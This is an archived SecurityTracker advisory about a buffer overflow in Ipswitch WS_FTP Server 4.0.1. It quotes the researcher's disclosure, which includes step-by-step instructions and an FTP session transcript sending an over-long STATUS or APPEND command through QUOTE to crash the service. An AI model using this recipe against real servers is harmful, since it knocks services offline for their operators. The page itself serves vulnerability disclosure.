SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Server Can Be Crashed By Remote Users Sending QUOTE Commands
SecurityTracker Alert ID:  1007652
SecurityTracker URL:  http://securitytracker.com/id/1007652
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 7 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 4.0.1
Description:   A buffer overflow vulnerability was reported in the WS_FTP Server. A remote authenticated user can cause the FTP service to crash.

It is reported that a remote authenticated user can use the QUOTE command to send a specially crafted command to the server to cause the FTP service to crash.

A demonstration exploit transcript is provided:

C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

It is reported that the STATUS, APPEND, and other commands can be used to trigger the flaw.

Impact:   A remote authenticated user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/Products/WS_FTP-Server/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Remote and Local Vulnerabilities In WS_FTP Server




hi dear
i am pejman.d ,i finded the new bug in ws_ftp server 
 
Vulnerable Systems : ws_ftp server  4,3
the bug is buffer overflow in ftp command service stop and some error

step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command  to server 
3- you can use  status or append or some command 
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
 

quote
Command line to send 
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
 
SAMPLE :
 
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Connection closed by remote host.
ftp>
 
 
ftp server is stop and all connection is refused !!!
it's work at ver 3,4  and test on the windows 2000 advance and prof  with  
sp4 
 
i u need the additional information send mail to pejman@rite.ca
 
pejman.d (deject hacker )

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC